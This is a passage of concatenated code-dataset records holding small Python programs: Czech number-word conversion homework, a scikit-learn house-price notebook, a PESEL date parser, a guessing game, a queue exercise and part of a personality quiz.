háèkù napø. dvestepadesatsedmtisictristasedmdesatpet a toto èíslo pøevede do opaèného zápisu. \nPokud vstup neodpovídá ani jedné z tìchto možností, vytiskne 'ERROR' a skonèí.\nVstup dvestepadesatsedmtisictristasedmdesatpet výstup 257375\nVstup 543210 výstup petsetctyricettritisicedvestedeset\nVšechny èísla jsou pouze celá èísla v rozsahu 1 až 999999.\nPro slovni cislo jsou použity tyto slovni vyjadreni: \njeden, dva, tri, ctyri, pet, sest, sedm, osm, devet, deset, jedenact, dvanact, trinact, ctrnact, patnact, sestnact, sedmnact, osmnact, devatenact, dvacet, tricet, ctyricet, padesat, sedesat, sedmdesat, osmdesat, devadesat, sto, dveste, trista, ctyrista, petset, sestset, sedmset, osmset, devetset, tisic, tisice.\n\nPozn.: V èeštinì je správnì “dvatisice”, ale lze napsat “stodvatisic” a “stodvatisice”. Po Vás požadujeme øešení ve tvaru “stodvatisice”.\n\"\"\"\n\n\"\"\"\nMRDKA NEJÌTŠÍHO KALIBRU CO JDE!!!!\n\"\"\"\n\ncisla1 = ['jeden', 'dva', 'tri', 'ctyri', 'pet', 'sest', 'sedm', 'osm', 'devet']\ncisla1num = [i for i in range(1,11)]\ncisla11 =['deset','jedenact', 'dvanact','trinact', 'ctrnact', 'patnact', 'sestnact', 'sedmnact', 'osmnact', 'devatenact']\ncisla11num = [i for i in range(10,20)]\ncisla10 = ['dvacet', 'tricet', 'ctyricet', 'padesat', 'sedesat', 'sedmdesat', 'osmdesat', 'devadesat']\ncisla10num = [i for i in range (20,100,10)]\ncisla100 =['sto', 'dveste', 'trista', 'ctyrista', 'petset', 'sestset', 'sedmset', 'osmset', 'devetset']\ncisla100num= [i for i in range (100, 1000,100)]\ncisla1000=['tisice', 'tisic']\n\nitterable = [cisla100, cisla100num, cisla10, cisla10num, cisla11, cisla11num, cisla1, cisla1num]\n\ndef checklength (substring):\n if (len(substring)<2):\n return True\n else:\n return False\n\ndef iterateArray (array, substring):\n for num in array:\n if (substring.find(num) != -1):\n return array.index(num)\n\ndef addNum (index, arraynum,output):\n output +=arraynum [index]\n return output\n\ndef sliceString (index, array,substring):\n substring = substring[len(array[index]):]\n return substring\n \n \n \n \n\n#print (iterateArray(cisla100,\"dvestepadesat\"))\n\ndef make100(vstup):\n \n substring = vstup\n output =0\n \n \n for i in range (0,8,2):\n index=iterateArray(itterable [i],substring)\n \n if not (index == None):\n output = addNum(index, itterable [i+1], output)\n substring =sliceString(index, itterable [i], substring)\n \n if (checklength(substring)):\n return output\n \n\n \n\ndef getDecimal(stringnum):\n #nalezne pozici 1000\n a = stringnum.find(\"tisic\")\n output =0\n \n if (a != -1):\n \n preffix = make100(stringnum[:a]) \n if (preffix ==0):\n preffix =1\n \n suffix = make100(stringnum[a+5:]) \n output = preffix * 1000 +suffix\n \n else:\n suffix = make100(stringnum) \n output = output +suffix\n \n return (output)\n\n\ndef getWord (num):\n num = int(num)\n output = ''\n digits =[]\n\n \n for i in range (6): \n digits.append(int(num%10))\n num=int(num/10)\n \n \n\n if (digits[0] != 0):\n output=cisla1[digits[0]-1]\n \n \n if (digits[1] != 0):\n \n if (digits [1] ==1) : \n output =cisla11[digits[0]]\n \n else:\n output = cisla10[digits[1]-2]+output\n \n \n if(digits[2] != 0):\n output = cisla100[digits[2]-1]+output\n \n \n if (digits[3] != 0):\n \n \n if (digits [4] ==0 and digits [5] ==0):\n #2000 3000\n if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n output = cisla1[digits[3]-1]+\"tisice\"+output\n #5000\n else:\n output = cisla1[digits[3]-1]+\"tisic\"+output\n #11000,513000 \n elif (digits[4] == 1):\n output =cisla11[digits[3]]+\"tisic\"+output\n \n elif (digits [4]==0):\n if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n output = cisla1[digits[3]-1]+\"tisice\"+output\n #5000\n else:\n output = cisla1[digits[3]-1]+\"tisic\"+output\n \n \n else:\n #53000,136000\n \n if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n output = cisla10[digits[4]-2]+ (cisla1[digits[3]-1]+\"tisice\"+output)\n #5000\n else:\n output = cisla10[digits[4]-2]+ (cisla1[digits[3]-1]+\"tisic\"+output) \n \n \n elif (digits [3]== 0):\n \n \n if (digits[4] == 1):\n output =\"desettisic\"+output\n \n elif (digits[4]!= 0):\n output = cisla10[digits[4]-2]+\"tisic\"+output\n \n \n \n if(digits[5] != 0):\n \n if (digits [4]==0 and digits[3]==0):\n \n output = cisla100[digits[5]-1]+ \"tisic\"+output\n \n else:\n output = cisla100[digits[5]-1]+ output \n \n return output \n\n \n\n\"\"\"\nprint(getWord(900000))print( getDecimal(\"dvestepadesatsedmtisictristasedmdesatpet\"))\nprint( getDecimal(\"petsetctyricettritisicedvestedeset\"))\nprint( getDecimal(\"dvatisicepetsetdevet\"))\nprint( getDecimal(\"tisicsedmset\" )) \"\"\"\n\n \nvstup = input()\nisNumber =False\nisAllowed = True\n\n\nasci =ord(vstup[0])\nif ((asci >= 48 and asci <=57)):\n isNumber = True \n \nfor i in range (1,len(vstup)):\n asci =ord(vstup[i])\n if (isNumber):\n \n if not(asci >= 48 and asci <=57):\n isAllowed = False\n break\n \n else:\n if not (asci >= 97 and asci <=122):\n isAllowed =False\n break\n\n\nif not (isNumber):\n substring = vstup\n for i in range (0,8,1):\n #every array must be itterate 2 times\n if (i%2 ==1):\n i -= 1\n index=iterateArray(itterable [i],substring)\n if (index != None):\n ind =substring.find (itterable [i][index])\n substring = substring[:ind] + substring [ind + len(itterable[i] [index]):]\n \n \n if ((len(substring)== 0 or substring ==\"tisic\"or substring ==\"tisice\")and (isAllowed)):\n print(getDecimal(vstup))\n else: \n print(\"ERROR\")\n \nelif (isAllowed):\n print(getWord(vstup))\nelse: \n print(\"ERROR\")\n \n\n\n \n \n\ncisla1 = {\n 'jeden': 1, \n 'dva': 2, \n 'tri': 3, \n 'ctyri': 4, \n 'pet': 5, \n 'sest': 6, \n 'sedm': 7, \n 'osm': 8, \n 'devet': 9}\ncisla10 ={\n 'deset': 10, \n 'jedenact': 11, \n 'dvanact': 12, \n 'trinact': 13, \n 'ctrnact': 14, \n 'patnact': 15, \n 'sestnact': 16, \n 'sedmnact': 17, \n 'osmnact': 18, \n 'devatenact': 19,\n 'dvacet': 20, \n 'tricet': 30, \n 'ctyricet': 40, \n 'padesat': 50, \n 'sedesat': 60, \n 'sedmdesat': 70, \n 'osmdesat': 80, \n 'devadesat': 90}\ncisla100 ={\n 'sto': 100, \n 'dveste': 200, \n 'trista': 300, \n 'ctyrista': 400, \n 'petset': 500, \n 'sestset': 600, \n 'sedmset': 700, \n 'osmset': 800, \n 'devetset': 900}\ncisla1000={\n 'tisic': 1000, \n 'tisice': 1000}\n\n\n\n\n\n \n\n\n\n","repo_name":"stefkalad/B3B33ALP","sub_path":"HW/HW03/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43006497374","text":"from random import choice\ncounter = 0\ni=0\nwhile counter <100:\n print(counter)\n counter = counter + choice(range(10))\n i = i+1\nprint(\"number of counts = \", i)\n\npop = 100\nyear = 0\nwhile 1:\n pop = pop*1.1\n year =year+1\n if pop>1000:\n break\nprint(\"Final pop =\", pop)\nprint(\"Years it takes =\", year)\n","repo_name":"tsatsa-ChemE/chem160module3","sub_path":"whiles.py","file_name":"whiles.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"49677612","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Real Estate Price Predictor\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\n#data frame name housing\nhousing=pd.read_csv(\"data.csv\")\nhousing.head()\n\n\n# In[3]:\n\n\nhousing.info()\n#help in checking missing data\n\n\n# In[4]:\n\n\nhousing[\"CHAS\"].value_counts()\n#0 in how many entries and 1 in how many entries\n\n\n# In[5]:\n\n\nhousing.describe()\n#from count we know the number of row shaving null values\n\n\n# In[6]:\n\n\nhousing.tail()\n\n\n# In[7]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n#to visualise graph here only\n\n\n# In[8]:\n\n\nimport matplotlib.pyplot as plt\n\n\n# In[9]:\n\n\n# housing.hist(bins=50,figsize=(20,15))\n# #dont need plt.show()in jupyter\n\n\n# ## Train-Test Splitting\n\n# In[10]:\n\n\n# import numpy as np \n\n# #np.random.seed(42) means as many times u run it will remain same\n# #dont use random bcz test data will showed in training data when ever executing aprogram\n# #to avoid overfitting model will memorise all data\n# def split_train_test(data,test_ratio):\n# np.random.seed(42)\n# shuffled=np.random.permutation(len(data))\n# test_set_size=int(len(data)*test_ratio)\n# test_indices=shuffled[:test_set_size]\n# train_indices=shuffled[test_set_size:]\n# return data.iloc[train_indices],data.iloc[test_indices]\n\n\n# In[11]:\n\n\n# train_set,test_set=split_train_test(housing,0.2)\n\n\n# In[12]:\n\n\nfrom sklearn.model_selection import train_test_split\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\nprint(f\"Rows in test set: {len(test_set)} Rows in train set: {len(train_set)}\")\n\n\n# In[13]:\n\n\n#If CHAS is an important feature if it is on equal part train and test data shouold represent total population\n#so use stratified sampling\nfrom sklearn.model_selection import StratifiedShuffleSplit\nsplit=StratifiedShuffleSplit(n_splits=1,test_size=0.2,random_state=42)\nfor train_index,test_index in split.split(housing,housing[\"CHAS\"]):\n strat_train_set=housing.loc[train_index]\n strat_test_set=housing.loc[test_index]\n\n\n# In[14]:\n\n\nstrat_train_set.info()\n\n\n# In[15]:\n\n\nstrat_test_set[\"CHAS\"].value_counts()\n\n\n# In[16]:\n\n\nstrat_train_set[\"CHAS\"].value_counts()\n\n\n# In[17]:\n\n\nhousing=strat_train_set.copy()\n\n\n# ## Looking For Correlations\n\n# In[18]:\n\n\n#inbuilt function in pandas to generate corelation matrix\ncorr_matrix=housing.corr()\n\n\n# In[19]:\n\n\n#see pearson corelation matrix 1 refers to high corelation lie betn -1 to +1 seee +ve and -ve corelation\ncorr_matrix['MEDV'].sort_values(ascending=False)\n\n\n# In[20]:\n\n\n# from pandas.plotting import scatter_matrix\n# #plot only strong relation values\n# attributes=[\"MEDV\",\"RA\",\"ZN\",\"LSTAT\"]\n# scatter_matrix(housing[attributes],figsize=(12,8))\n\n\n# In[21]:\n\n\n# housing.plot(kind=\"scatter\",x=\"RA\",y=\"MEDV\",alpha=0.8)\n\n\n# In[22]:\n\n\n#we can remove the outliers\nhousing[\"TAXRA\"]=housing[\"TAX\"]/housing[\"RA\"]\nhousing.head()\n\n\n# In[23]:\n\n\n# attributes=[\"MEDV\",\"RA\",\"ZN\",\"LSTAT\"]\n# scatter_matrix(housing[attributes],figsize=(12,8))\n\n\n# In[24]:\n\n\n# housing.plot(kind=\"scatter\",x=\"TAX\",y=\"MEDV\",alpha=0.8)\n\n\n# In[25]:\n\n\nhousing=strat_train_set.drop(\"MEDV\",axis=1)\nhousing_labels=strat_train_set[\"MEDV\"].copy()\n\n\n# # #Taking Care Of Missing DATA\n\n# In[26]:\n\n\na=housing.dropna(subset=[\"RA\"])\na.shape\n# here housing data frame is not changed to change it pass inplace=True inside bracket\n\n\n# In[27]:\n\n\n#option2\nhousing.drop(\"RA\",axis=1).shape\n# there will be no RA coulmn shown but originally is not changed\n\n\n# In[28]:\n\n\n# option 3 replace with median mean or mode\nmedian=housing[\"RA\"].median()\nhousing[\"RA\"].fillna(median)\n\n\n# In[29]:\n\n\nhousing.shape\n\n\n# In[30]:\n\n\nhousing.describe()\n# before starting imputer\n\n\n# In[31]:\n\n\n#if test set have missing data\nfrom sklearn.impute import SimpleImputer\nimputer=SimpleImputer(strategy=\"median\");\nimputer.fit(housing)\n# fit imputer to housing data\n\n\n# In[32]:\n\n\nimputer.statistics_\n# reeplace every null value with median in every attribute\n\n\n# In[33]:\n\n\nX=imputer.transform(housing)\n\n\n# In[34]:\n\n\nhousing_tr=pd.DataFrame(X,columns=housing.columns)\n#transformed missing value of missing data\n\n\n# In[35]:\n\n\nhousing_tr.describe()\n\n\n# ## SK learn Library \n\n# In[36]:\n\n\n#sk learn has 3 objects\n# 1 Estimators-It estimates some parameter based on a data set like imputer\n# it has a fit method and transform method\n#Fit-method-Fits The Data SEt and Calculates Internal Parameter has hyper parameter like strategy\n#Transform Method-Take input and returns outp\n#Tra\n\n\n# In[37]:\n\n\n# building pipeline and before it automate the data set\n\n\n# ## Feature Scaling\n\n# In[38]:\n\n\n# primarily 2 types of feature scaling Method\n# 1.Min-max Scaling(Normalisation)\n# (value-min)/(max-min)\n# here value lie in certain range ie from 0 to 1\n# Sklearn provides MinMAxScaler for this\n# 2.Standardisation\n# (value-mean)/standarddeviation\n# Sklearn provides StandardScaler for this\n\n\n\n# In[39]:\n\n\nfrom sklearn.pipeline import Pipeline\n# feature scaling scale feature value to cer \nfrom sklearn.preprocessing import StandardScaler\n# add as many things in pipeline ,pipeline takes a string\nmy_pipeline=Pipeline([(\"imputer\",SimpleImputer(strategy=\"median\")),\n (\"std_scaler\",StandardScaler())])\n\n\n# In[40]:\n\n\nhousing_num_tr=my_pipeline.fit_transform(housing)\n#every process u done must be in pipeline so transform before imputed data to the pipe line \n\n\n# In[41]:\n\n\nhousing_num_tr\n#it is an numpy array predictor use numpy array as input\n\n\n# ## Selecting A Desired Model\n\n# In[42]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n# model=LinearRegression()\n# model=DecisionTreeRegressor()\nmodel=RandomForestRegressor()\nmodel.fit(housing_num_tr,housing_labels)\n\n\n# In[43]:\n\n\nsome_data=housing.iloc[:5]\nsome_labels=housing_labels.iloc[:5]\nprepared_data=my_pipeline.transform(some_data)\nmodel.predict(prepared_data)\n\n\n# In[44]:\n\n\nlist(some_labels)\n\n\n# ## Evaluating The Model\n\n# In[45]:\n\n\nfrom sklearn.metrics import mean_squared_error\nhousing_predictions=model.predict(housing_num_tr)\nmse = mean_squared_error(housing_labels,housing_predictions)\nrmse = np.sqrt(mse)\n\n\n# In[46]:\n\n\nrmse\n# it has 0 errror bcz it deeply understand the model and got over fitted also learned the noise \n\n\n# ## Using Better Evaluation Technique And Cross Validation\n\n# In[47]:\n\n\n#1 2 3 4 5 67 8 9 \nfrom sklearn.model_selection import cross_val_score\nscores=cross_val_score(model,housing_num_tr,housing_labels,scoring=\"neg_mean_squared_error\",cv=10)\n#do or 10 folds our scores here negative\nrmse_scores=np.sqrt(-scores)\nrmse_scores\n# for prices to have 24 32 36 etc 4 to 5 error is ok\n\n\n# In[48]:\n\n\ndef print_scores(scores):\n print(\"Scores:\",scores)\n print(\"Mean:\",scores.mean())\n print(\"standard Deviation:\", scores.std())\n\n\n# In[49]:\n\n\nprint_scores(rmse_scores)\n\n\n# ## Saving The Model\n\n# In[52]:\n\n\nfrom joblib import dump, load\ndump(model, \"RealEstate.joblib\")\n\n\n# ## TESTING THE MODEL\n\n# In[55]:\n\n\nX_test=strat_test_set.drop(\"MEDV\",axis=1)\nY_test=strat_test_set[\"MEDV\"].copy()\nX_test_prepared=my_pipeline.transform(X_test)\nfinal_predictions=model.predict(X_test_prepared)\nfinal_mse=mean_squared_error(Y_test,final_predictions)\nfinal_rmse=np.sqrt(final_mse)\n#print(final_predictions,list(Y_test))\n\n\n# In[56]:\n\n\nfinal_rmse\n\n\n# In[57]:\n\n\nprepared_data[0]\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"devaaman/Real_Estate_Price_predictor","sub_path":"ml project/Real estate.py","file_name":"Real estate.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923135529","text":"import os\n\n\ndef checkPesel():\n odczyt = []\n dane = []\n pesel = str\n deszyfrFile = open(\"PESEL_INFO.txt\", \"w+\")\n \n if os.path.isfile(\"PESEL.txt\"): # Jeśli uda się otworzyć\n with open(\"PESEL.txt\", \"r\") as file:\n odczyt = file.readlines() # Odczytuje każdą linijkę pliku\n \n for i in range(len(odczyt)):\n pesel = odczyt[i]\n pesel = pesel.replace(\"\\n\", \"\") # Usuwamy znaki końca linii\n \n if (len(pesel) == 11): # Sprawdza czy pesel ma odpowiednią liczbę znaków\n dane.append(pesel)\n\n for i in range(len(dane)):\n pesel = dane[i]\n gender = str\n year = int(pesel[0:2])\n month = int(pesel[2:4])\n day = int(pesel[4:6])\n \n if month - 20 >= 1:\n year += 2000\n else:\n year += 1900\n \n if (pesel[9]) in \"02468\": # Jeżeli na pozycji 9 jest liczba parzysta, to płeć = kobieta\n gender = \"K\"\n else:\n gender = \"M\"\n \n deszyfrFile.write(\n pesel\n + \":\\ndata urodzenia: {0}-{1}-{2};\".format(year, month, day)\n + \"\\tpłeć: {0}\".format(gender)\n + \"\\n\\n\"\n )\n\n\ncheckPesel()\n","repo_name":"tTargiel/UNI-Python-Programming","sub_path":"Lista 08/zadanie_04.py","file_name":"zadanie_04.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"927704267","text":"from typing import Union\ntry:\n from typing import Literal\nexcept:\n from typing_extensions import Literal\n\nNUM = Union[int, float]\n\nLENSID = Union[int, str]\n\nSPECIES_LIST = Literal[\"human\", \"mouse\", \"rat\", \"zebrafish\", \"fly\",\n \"m_fascicularis\", \"other\"]\nOMICS_LIST = Literal[\"RNA\", \"ADT\", \"PRTB\", \"spatial\", \"NA\"]\nUNIT_TYPE_LIST = Literal[\"norm\", \"raw\"]\nUNIT_TRANSFORM_LIST = Literal[\"none\", \"log2\"]\nUNIT_LIST = Literal[\"umi\", \"lognorm\", \"read\", \"cpm\", \"tpm\", \"rpkm\", \"fpkm\",\n \"unknown\"]\nINPUT_FORMAT_LIST = Literal[\"fullmatrix\", \"mtx\", \"h5matrix\",\n \"crisprfullmatrix\", \"visium\", \"h5visium\", \"bcs\",\n \"seurat\", \"scanpy\", \"loomamgen\", \"fastq\",\n \"csv\", \"txt\", \"tsv\", \"nanostring\", \"dsp\"] # No UPPER CASE allowed for backward compatibility purpose\nNORMALIZATION_LIST = Literal[\"none\", \"lognorm\"]\n\nMETADATA_TYPE_LIST = Literal[\"category\", \"numeric\"]\nFEATURE_TYPES = Literal[\"RNA\", \"ADT\", \"PRTB\"]\nUNASSIGNED = \"Unassigned\"\nMETADATA_TYPE_NUMERIC = \"numeric\"\nMETADATA_TYPE_CATEGORICAL = \"category\"\nBIOTURING_UNASSIGNED = \"Unassigned\"\n\nLENS_MODE = Literal[\"PRIVATE\", \"PUBLIC\"]\nLENS_IMAGE_TYPE = Literal[\"truecolor\", \"multiplex\"]\n\nBATCH_CORRECTION = Literal[\"none\", \"harmony\", \"cca\", \"mnn\"]","repo_name":"bioturing/bbrowser_python_studyio","sub_path":"walnut/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18749333668","text":"import time\nimport random\n\ndef get_numbers():\n while True:\n yield random.randint(0, 26)\n\nspeed = get_numbers()\n\nspeed_history = []\n\nwhile True:\n current_speed = next(speed)\n if speed_history:\n previous_speed = speed_history[-1]\n if current_speed < previous_speed:\n print(\"Speed decreasing\")\n else:\n print(\"Speed not decreasing\")\n print(\"Current: \" + str(current_speed))\n print(\"Previous: \" + str(speed_history[-1]))\n else:\n print(\"Current: \" + str(current_speed))\n speed_history.append(current_speed)\n \n time.sleep(.5)","repo_name":"MagnusLaue/132-Project","sub_path":"decreasing.py","file_name":"decreasing.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7921779698","text":"import random\r\ndef jogar():\r\n\r\n\r\n print(\"---------------------------------\")\r\n print(\"Bem vindo ao jogo de adivinhação\")\r\n print(\"---------------------------------\")\r\n\r\n numero_secreto = random.randrange(1,101)\r\n tentativas = 0\r\n pontos = 1000\r\n\r\n print (\"NÍVEIS DE DIFICULDADE\")\r\n print (\" (1) Fácil (2) Médio (3) Díficil\")\r\n nivel = int(input(\"Escolha o nível : \"))\r\n\r\n if(nivel == 1):\r\n tentativas = 20\r\n elif(nivel == 2):\r\n tentativas = 10\r\n elif(nivel ==- 3):\r\n tentativas == 5\r\n\r\n\r\n for rodada in range(1, tentativas + 1):\r\n\r\n print(\"Tentativa {} de {}\".format(rodada, tentativas))\r\n\r\n chute_str = input(\"Digite um número de 1 à 100: \")\r\n print(\"Você digitou \", chute_str)\r\n chute = int(chute_str)\r\n\r\n if(chute < 1 or chute > 100 ):\r\n print(\"Seu número é inválido, digite novamente!\")\r\n continue\r\n\r\n\r\n\r\n acertou = numero_secreto == chute\r\n errou_maior = numero_secreto < chute\r\n errou_menor = numero_secreto > chute\r\n\r\n if (acertou):\r\n print(\"ACERTOU\")\r\n print(\"Sua pontuação foi de {}\".format(pontos))\r\n print(\"-------------------------------------------------\")\r\n break\r\n else:\r\n if (errou_maior):\r\n print(\"ERROU! Seu chute está maior que o número secreto\")\r\n print(\"-------------------------------------------------\")\r\n elif (errou_menor):\r\n print(\"ERROU! Seu chute está menor que o número secreto\")\r\n print(\"-------------------------------------------------\")\r\n pontos_perdidos = abs(numero_secreto - chute)\r\n pontos = pontos - pontos_perdidos\r\n\r\n\r\n print(\"O número era {}\".format(numero_secreto))\r\n print(\"Fim do jogo!\")\r\n\r\nif (__name__ == \"__main__\"):\r\n jogar()","repo_name":"GabrielFaustinoIT/Python-3","sub_path":"Jogos/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74245146088","text":"class Animal:\n def __init__(self,type,name) :\n self.type = type\n self.name = name\n def __str__(self) -> str:\n return self.name\n\nclass queue:\n def __init__(self) :\n self.list = []\n def __str__(self) :\n result = [str(animal) for animal in self.list]\n print(result) \n return \"Data printed\"\n def enqueue(self,animal):\n self.list.append(animal)\n\n def isempty(self):\n return True if len(self.list)==0 else False \n\n def sepecific_dequeue(self,type):\n if not self.isempty() :\n for index in range(len(self.list)):\n \n if self.list[index].type ==type:\n popanimal = self.list.pop(index)\n return popanimal.type\n\n def dequeue(self):\n if not self.isempty():\n popanimal = self.list.pop(0)\n return popanimal.name\n\n\nDog1 = Animal('Dog','Dog1') \nCat1 = Animal('Cat','Cat1')\nDog2 = Animal('Dog','Dog2') \nCat2 = Animal('Cat','Cat2')\nDog3 = Animal('Dog','Dog3')\nCat3 = Animal('Cat','Cat3')\nCat4 = Animal('Cat','Cat4')\nDog4 = Animal('Dog','Dog4')\nCat5 = Animal('Cat','Cat5')\n\nqueueanimal = queue()\nqueueanimal.enqueue(Dog1)\nqueueanimal.enqueue(Dog2)\nqueueanimal.enqueue(Cat1)\nqueueanimal.enqueue(Dog3)\nqueueanimal.enqueue(Cat2)\nqueueanimal.enqueue(Dog4)\nqueueanimal.enqueue(Cat3)\nqueueanimal.enqueue(Cat4)\n\nprint(queueanimal)\nprint(queueanimal.dequeue())\nprint(queueanimal)\nprint(queueanimal.sepecific_dequeue('Cat'))\nprint(queueanimal)\n\n \n","repo_name":"Akashsahoo/DSQUEUE","sub_path":"Question/Dogcatqueue.py","file_name":"Dogcatqueue.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29952745085","text":"from random import shuffle\nimport time\n\ndef personality(choices):\n\tquestion_list =[Question(\"I like to work on many tasks at the same time instead of focusing on one.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I tend to discuss big decisions with most of my friends.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I prefer to take some alone time for myself when I can get it.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\t\t\t\t\tQuestion(\"At a party, I'd prefer to talk to one close friend rather than a crowd.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\t\t\t\t\tQuestion(\"In my free time, I'd choose to go meet with a social group over staying home.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I like to think through things myself rather than bounce ideas off of lots of people.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\n\t\t\t\t\tQuestion(\"When approaching a new project, I like to see the big picture before considering the details.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\t\t\t\t\tQuestion(\"I think it's fun to think through a lot different possibilities rather than focus on a single opportunity.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\t\t\t\t\tQuestion(\"If I'm dealing with a situation I've encountered before, I'd rather just handle it the same way as last time instead of wasting time thining of new solutions.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"I notice small details easily.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"I'd rather focus on the reality of a situation than play through the possibilities of what could be.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"When playing a new game, I usually pick up on the rules pretty quickly just from playing.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\n\t\t\t\t\tQuestion(\"I usually understand how people are feeling without having to ask.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\t\t\t\t\tQuestion(\"I prefer to follow the rules, even when it can adversely affect me.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"I tend to trust my head over my heart.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"When making a large decision, I make a point of considering how it will affect those around me.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\t\t\t\t\tQuestion(\"I'd rather make the right choice and hurt someone's feelings a little than make the wrong choice.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"I'd rather play a game with my close friends where we all work together than compete to have a winner and losers.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\n\t\t\t\t\tQuestion(\"I'd rather have an agenda before agreeing to a trip with coworkers or friends.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"I like to leave my schedule open in case something I want to do comes up.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\"),\n\t\t\t\t\tQuestion(\"When building something, I try it myself before looking at the included instructions.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\"),\n\t\t\t\t\tQuestion(\"I'd rather turn in work on time, even if it's not my best.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"I think games can only fun if people play by the rules.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"If I'm on my way to dinner at a restaurant I know and see one that my friends have said they love, I'll go there instead of where I planned to go.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\")]\n\n\tanswers = []\n\tresults = {\"Introvert\" : 0, \"Extrovert\" : 0, \"Intuition\" : 0, \"Sensing\" : 0, \"Thinking\" : 0, \"Feeling\" : 0, \"Judging\" : 0, \"Perceiving\" : 0}\n\tsymbols = {\"Introvert\" : 'I', \"Extrovert\" : 'E', \"Intuition\" : 'N', \"Sensing\" : 'S', \"Thinking\" : 'T', \"Feeling\" : 'F', \"Judging\" : 'J', \"Perceiving\" : 'P'}\n\ttypes = ['Introvert', 'Extrovert', 'Intuition', 'Sensing', 'Thinking', 'Feeling', 'Judging', 'Perceiving']\n\tpersonality_type = {}\n\tpersonality_code = ''\n\tscale = 7\n\n\tif choices != None and len(choices) == len(question_list):\n\t\tfor x in range(len(choices)):\n\t\t\tquestion_list[x].set_value((choices[x]-1)*(100/(scale-1)))\n\n\telse:\n\t\t# Shuffle questions\n\t\t# shuffle(question_list)\n\n\t\t# Ask each question and record the answer in the question\n\t\tfor question in question_list:\n\t\t\tprint('')\n\t\t\tprint(question.get_question())\n\t\t\tprint(question.get_left() + ' ' + (''.join(str(x) + ' ' for x in range(1, scale+1))) + question.get_right())\n\t\t\tans = 0\n\t\t\twhile ans == 0:\n\t\t\t\tchoice = input('Choice: ')\n\t\t\t\ttry:\n\t\t\t\t\tchoice = int(choice)\n\t\t\t\t\tans = 1\n\t\t\t\texcept:\n\t\t\t\t\tif choice == 'q':\n\t\t\t\t\t\tprint('Have a nice day.')\n\t\t\t\t\t\treturn False\n\t\t\t\t\tprint('Please input a valid response')\n\t\t\t\t\tprint('')\n\n\t\t\tprint('')\n\t\t\tquestion.set_value((choice-1)*(100/(scale-1)))\n\t\t\tanswers.append(choice)\n\n\n\t# Calculate the percentages for each of the 8 types\n\t# If the value was greater than 50% use 